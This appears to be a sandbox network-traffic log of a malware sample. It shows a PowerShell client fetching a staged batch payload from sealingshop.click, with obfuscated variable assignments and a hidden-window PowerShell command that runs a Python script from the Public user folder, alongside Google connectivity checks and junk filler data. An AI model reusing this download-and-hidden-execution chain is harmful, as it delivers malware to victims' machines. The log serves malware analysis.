2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 77 33 34 66 79 38 39 77 65 66 79 65 38 39 77 66 79 73 64 75 66 68 7a 73 67 65 69 37 74 67 79 61 75 77 69 64 66 68 76 62 61 77 33 34 39 38 66 79 61 73 65 64 38 39 66 68 77 65 39 38 74 79 77 65 64 39 38 66 67 79 38 77 34 39 65 74 79 67 38 39 77 65 73 66 68 76 61 77 38 39 65 74 79 73 64 67 38 39 7a 73 65 79 74 38 7a 39 77 65 79 74 39 37 38 77 65 67 68 34 38 65 79 68 47 54 34 74 33 38 39 37 38 39 62 33 34 38 39 62 6e 37 38 37 34 38 38 37 33 77 76 62 34 38 65 72 76 62 72 76 76 65 72 74 65 73 72 79 62 72 79 73 62 6e 65 72 79 65 74 62 64 67 79 39 64 38 72 67 79 65 38 39 72 67 79 65 73 34 38 39 75 67 79 39 30 65 34 72 67 64 72 38 39 67 79 77 30 34 74 75 30 77 34 75 67 73 30 65 39 75 67 30 73 39 34 65 79 75 67 30 38 77 39 34 79 67 76 39 38 64 72 79 67 38 39 65 72 Data Ascii: w34fy89wefye89wfysdufhzsgei7tgyauwidfhvbaw3498fyased89fhwe98tywed98fgy8w49etyg89wesfhvaw89etysdg89zseyt8z9weyt978wegh48eyhGT4t389789b3489bn78748873wvb48ervbrvvertesrybrysbneryetbdgy9d8rgye89rgyes489ugy90e4rgdr89gyw04tu0w4ugs0e9ug0s94eyug08w94ygv98dryg89er
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 77 65 66 79 65 38 39 77 66 79 73 64 75 66 68 7a 73 67 65 69 37 74 67 79 61 75 77 69 64 66 68 76 62 61 77 33 34 39 38 66 79 61 73 65 64 38 39 66 68 77 65 39 38 74 79 77 65 64 39 38 66 67 79 38 77 34 39 65 74 79 67 38 39 77 65 73 66 68 76 61 77 38 39 65 74 79 73 64 67 38 39 7a 73 65 79 74 38 7a 39 77 65 79 74 39 37 38 77 65 67 68 34 38 65 79 68 47 54 34 74 33 38 39 37 38 39 62 33 34 38 39 62 6e 37 38 37 34 38 38 37 33 77 76 62 34 38 65 72 76 62 72 76 76 65 72 74 65 73 72 79 62 72 79 73 62 6e 65 72 79 65 74 62 64 67 79 39 64 38 72 67 79 65 38 39 72 67 79 65 73 34 38 39 75 67 79 39 30 65 34 72 67 64 72 38 39 67 79 77 30 34 74 75 30 77 34 75 67 73 30 65 39 75 67 30 73 39 34 65 79 75 67 30 38 77 39 34 79 67 76 39 38 64 72 79 67 38 39 65 72 73 79 67 38 39 65 79 Data Ascii: wefye89wfysdufhzsgei7tgyauwidfhvbaw3498fyased89fhwe98tywed98fgy8w49etyg89wesfhvaw89etysdg89zseyt8z9weyt978wegh48eyhGT4t389789b3489bn78748873wvb48ervbrvvertesrybrysbneryetbdgy9d8rgye89rgyes489ugy90e4rgdr89gyw04tu0w4ugs0e9ug0s94eyug08w94ygv98dryg89ersyg89ey
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 79 38 77 34 39 65 74 79 67 38 39 77 65 73 66 68 76 61 77 38 39 65 74 79 73 64 67 38 39 7a 73 65 79 74 38 7a 39 77 65 79 74 39 37 38 77 65 67 68 34 38 65 79 68 47 54 34 74 33 38 39 37 38 39 62 33 34 38 39 62 6e 37 38 37 34 38 38 37 33 77 76 62 34 38 65 72 76 62 72 76 76 65 72 74 65 73 72 79 62 72 79 73 62 6e 65 72 79 65 74 62 64 67 79 39 64 38 72 67 79 65 38 39 72 67 79 65 73 34 38 39 75 67 79 39 30 65 34 72 67 64 72 38 39 67 79 77 30 34 74 75 30 77 34 75 67 73 30 65 39 75 67 30 73 39 34 65 79 75 67 30 38 77 39 34 79 67 76 39 38 64 72 79 67 38 39 65 72 73 79 67 38 39 65 79 74 38 39 30 77 33 75 72 30 77 33 39 38 75 66 30 38 73 33 39 34 75 66 30 38 39 73 33 75 66 30 77 38 39 33 75 66 38 39 77 75 33 30 39 38 72 75 66 77 30 65 75 66 73 30 39 65 75 66 30 33 39 Data Ascii: y8w49etyg89wesfhvaw89etysdg89zseyt8z9weyt978wegh48eyhGT4t389789b3489bn78748873wvb48ervbrvvertesrybrysbneryetbdgy9d8rgye89rgyes489ugy90e4rgdr89gyw04tu0w4ugs0e9ug0s94eyug08w94ygv98dryg89ersyg89eyt890w3ur0w398uf08s394uf089s3uf0w893uf89wu3098rufw0eufs09euf039
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 39 65 74 79 67 38 39 77 65 73 66 68 76 61 77 38 39 65 74 79 73 64 67 38 39 7a 73 65 79 74 38 7a 39 77 65 79 74 39 37 38 77 65 67 68 34 38 65 79 68 47 54 34 74 33 38 39 37 38 39 62 33 34 38 39 62 6e 37 38 37 34 38 38 37 33 77 76 62 34 38 65 72 76 62 72 76 76 65 72 74 65 73 72 79 62 72 79 73 62 6e 65 35 34 33 34 35 72 79 65 74 62 64 67 79 39 64 38 72 67 79 65 38 39 72 67 79 65 73 34 38 39 75 67 79 39 30 65 34 72 67 64 72 38 39 67 79 77 30 34 74 75 30 77 34 75 67 73 30 65 39 75 67 30 73 39 34 65 79 75 67 30 38 77 39 34 79 67 76 39 38 64 72 79 67 38 39 65 72 73 79 67 38 39 65 79 74 38 39 30 77 33 75 72 30 77 33 39 38 75 66 30 38 73 33 39 34 75 66 30 38 39 73 33 75 66 30 77 38 39 33 75 66 38 39 77 75 33 30 39 38 72 75 66 77 30 65 75 66 73 30 39 65 75 66 30 33 Data Ascii: 9etyg89wesfhvaw89etysdg89zseyt8z9weyt978wegh48eyhGT4t389789b3489bn78748873wvb48ervbrvvertesrybrysbne54345ryetbdgy9d8rgye89rgyes489ugy90e4rgdr89gyw04tu0w4ugs0e9ug0s94eyug08w94ygv98dryg89ersyg89eyt890w3ur0w398uf08s394uf089s3uf0w893uf89wu3098rufw0eufs09euf03
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 68 77 65 39 38 74 79 77 65 64 39 38 66 67 79 38 77 34 39 65 74 79 67 38 39 77 65 73 66 68 76 61 77 38 39 65 74 79 73 64 67 38 39 7a 73 65 79 74 38 7a 39 77 65 79 74 39 37 38 77 65 67 68 34 38 65 79 68 47 54 34 74 33 38 39 37 38 39 62 33 34 38 39 62 6e 37 38 37 34 38 38 37 33 77 76 62 34 38 65 72 76 62 72 76 76 65 72 74 65 73 72 79 62 72 79 73 62 6e 65 72 79 65 74 62 64 67 79 39 64 38 72 67 79 65 38 39 72 67 79 65 73 34 38 39 75 67 79 39 30 65 34 72 67 64 72 38 39 67 79 77 30 34 74 75 30 77 34 75 67 73 30 65 39 75 67 30 73 39 34 65 79 75 67 30 38 77 39 34 79 67 76 39 38 64 72 79 67 38 39 65 72 73 79 67 38 39 65 79 74 38 39 30 77 33 75 72 30 77 33 39 38 75 66 30 38 73 33 39 34 75 66 30 38 39 73 33 75 66 30 77 38 39 33 75 66 38 39 77 75 33 30 39 38 72 75 66 Data Ascii: hwe98tywed98fgy8w49etyg89wesfhvaw89etysdg89zseyt8z9weyt978wegh48eyhGT4t389789b3489bn78748873wvb48ervbrvvertesrybrysbneryetbdgy9d8rgye89rgyes489ugy90e4rgdr89gyw04tu0w4ugs0e9ug0s94eyug08w94ygv98dryg89ersyg89eyt890w3ur0w398uf08s394uf089s3uf0w893uf89wu3098ruf

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:10 UTC	798	OUT	GET / HTTP/1.1 Host: google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 11:20:10 UTC	854	IN	HTTP/1.1 301 Moved Permanently Location: https://www.google.com/ Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-5RN62u941DfG8onZccdcNw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 11:20:10 GMT Expires: Fri, 03 Jan 2025 11:20:10 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 220 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:10 UTC	220	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:12 UTC	172	OUT	GET /config/stu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: sealingshop.click Connection: Keep-Alive
2024-12-04 11:20:13 UTC	934	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:13 GMT Content-Length: 992 Connection: close last-modified: Sat, 26 Oct 2024 05:10:12 GMT etag: "3e0-671c79b4-be1dac8453b685be;;;" accept-ranges: bytes platform: hostinger panel: hpanel x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1G4ix2U9%2B7A%2F87OSrVlj3%2FBx4UW9os8tgPSGJsVMphH2VHSMHFi7NaIkLnoXSiA2pjoReJDEgCAWdYbJO1JIWOT%2BiI9qlxi%2BmrF2ahsLAyP19USkoCRSo%2F1NUXLpg0M%2FHDk%2Bww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ecb67e72abc4380-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1653&rtt_var=639&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=786&delivery_rate=1686886&cwnd=216&unsent_bytes=0&cid=5882232d4afd5dc7&ts=1137&x=0"
2024-12-04 11:20:13 UTC	435	IN	Data Raw: ff fe 0d 0a 73 65 74 20 61 6a 73 66 67 76 38 69 31 66 73 64 67 3d 32 32 33 34 32 33 0a 73 65 74 20 61 6a 73 66 67 32 76 38 69 66 73 64 67 3d 32 32 33 34 32 33 0a 73 65 74 20 61 6a 73 66 67 33 76 38 69 66 73 64 67 3d 32 32 33 34 32 33 0a 73 65 74 20 61 6a 73 66 67 76 38 69 34 66 73 64 67 3d 32 32 33 34 32 33 0a 63 6d 64 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 69 64 64 65 6e 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 70 79 74 68 6f 6e 33 39 5c 5c 70 79 74 68 6f 6e 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 70 79 74 68 6f 6e 33 39 5c 5c 64 6f 63 75 6d 65 6e 74 73 2e 70 79 3b 0a 73 65 74 20 73 68 64 75 65 73 39 38 35 73 67 39 65 3d 32 34 33 34 32 33 0a 73 65 74 20 73 Data Ascii: set ajsfgv8i1fsdg=223423set ajsfg2v8ifsdg=223423set ajsfg3v8ifsdg=223423set ajsfgv8i4fsdg=223423cmd /c powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;set shdues985sg9e=243423set s
2024-12-04 11:20:13 UTC	557	IN	Data Raw: 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:12 UTC	802	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 11:20:13 UTC	1767	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:13 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-gIL_BFeovTh1sGDwJohX_g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; expires=Mon, 02-Jun-2025 11:20:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX; expires=Thu, 05-Jun-2025 11:20:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:20:13 UTC	1767	IN	Data Raw: 31 66 33 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 6d 2b 68 68 74 75 68 37 4e 4a 67 75 71 53 6e 58 48 45 41 49 71 71 4d 61 56 2b 47 58 43 6b 73 38 57 59 58 48 4a 4b 46 37 6c 36 41 65 59 4d 6a 2b 77 4f 2b 66 69 39 4f 64 44 71 46 6e 4a 54 67 39 74 30 34 39 32 44 79 6b 56 78 78 34 6a 70 76 46 62 78 6e 41 Data Ascii: 1f3a<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA
2024-12-04 11:20:13 UTC	1767	IN	Data Raw: 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b Data Ascii: b,d,c,h,e){e=e===void 0?k:e;d\|\|(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={
2024-12-04 11:20:13 UTC	1767	IN	Data Raw: 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 26 26 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2c 61 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 6e 73 2c 74 3d 72 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d Data Ascii: ce&&window.performance.timing&&"navigationStart"in window.performance.timing,aa=google.stvsc&&google.stvsc.ns,t=r?aa\|\|window.performance.timing.navigationStart:void 0;function u(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=
2024-12-04 11:20:13 UTC	1767	IN	Data Raw: 77 68 75 2c 70 61 3d 67 6f 6f 67 6c 65 2e 63 2e 70 63 69 2c 71 61 3d 67 6f 6f 67 6c 65 2e 63 2e 64 63 6c 74 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 61 2c 62 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 61 2c 53 74 72 69 6e 67 28 62 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 28 29 7b 72 65 74 75 72 6e 20 6e 61 3f 67 6f 6f 67 6c 65 2e 63 2e 77 68 3e 31 3a 21 30 7d 3b 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 Data Ascii: whu,pa=google.c.pci,qa=google.c.dclt;function z(a,b,c){google.tick("load",a,b,c)}function A(a,b){google.c.e("load",a,String(b))};function B(){return na?google.c.wh>1:!0};var ra=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");th
2024-12-04 11:20:13 UTC	934	IN	Data Raw: 63 29 61 28 48 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 46 28 48 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f Data Ascii: c)a(H(b[c]))};function ta(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();F(H(a,void 0,!0,!0),b)}}function J(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};google.tick=functio
2024-12-04 11:20:13 UTC	401	IN	Data Raw: 31 38 61 0d 0a 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 62 22 29 2c 21 31 2c 7b 6d 3a 61 2c 62 3a 62 5b 61 5d 3d 3d 3d 21 31 2c 73 3a 63 7d 29 3b 72 65 74 75 72 6e 21 31 7d 3b 67 6f 6f 67 6c 65 2e 72 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 63 28 65 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 64 2c 21 31 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 64 2c 21 31 29 7d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 64 2c 21 31 29 3b 62 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 64 2c 21 31 29 7d 3b 70 2e 67 6f 6f 67 6c Data Ascii: 18agoogle.ml(Error("b"),!1,{m:a,b:b[a]===!1,s:c});return!1};google.rll=function(a,b,c){function d(e){c(e);a.removeEventListener("load",d,!1);a.removeEventListener("error",d,!1)}a.addEventListener("load",d,!1);b&&a.addEventListener("error",d,!1)};p.googl
2024-12-04 11:20:13 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 29 3b 76 61 72 20 4b 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 3b 69 66 28 21 67 6f 6f 67 6c 65 2e 73 74 76 73 63 7c 7c 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 73 77 29 7b 76 61 72 20 4c 3d 4b 2e 74 2c 4d 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 4d 26 26 28 74 26 26 76 26 26 76 3e 74 26 26 76 3c 3d 4c 2e 73 74 61 72 74 3f 28 4c 2e 73 74 61 72 74 3d 76 2c 4b 2e 77 73 72 74 3d 76 2d 74 29 3a 4d 2e 6e 6f 77 26 26 28 4b 2e 77 73 72 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 75 28 29 29 29 29 7d 0a 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 41 46 54 53 74 61 72 74 22 2c 7b Data Ascii: 8000);var K=google.timers.load;if(!google.stvsc\|\|google.stvsc.sw){var L=K.t,M=window.performance;M&&(t&&v&&v>t&&v<=L.start?(L.start=v,K.wsrt=v-t):M.now&&(K.wsrt=Math.floor(u())))}window.performance&&performance.mark&&performance.mark("SearchAFTStart",{
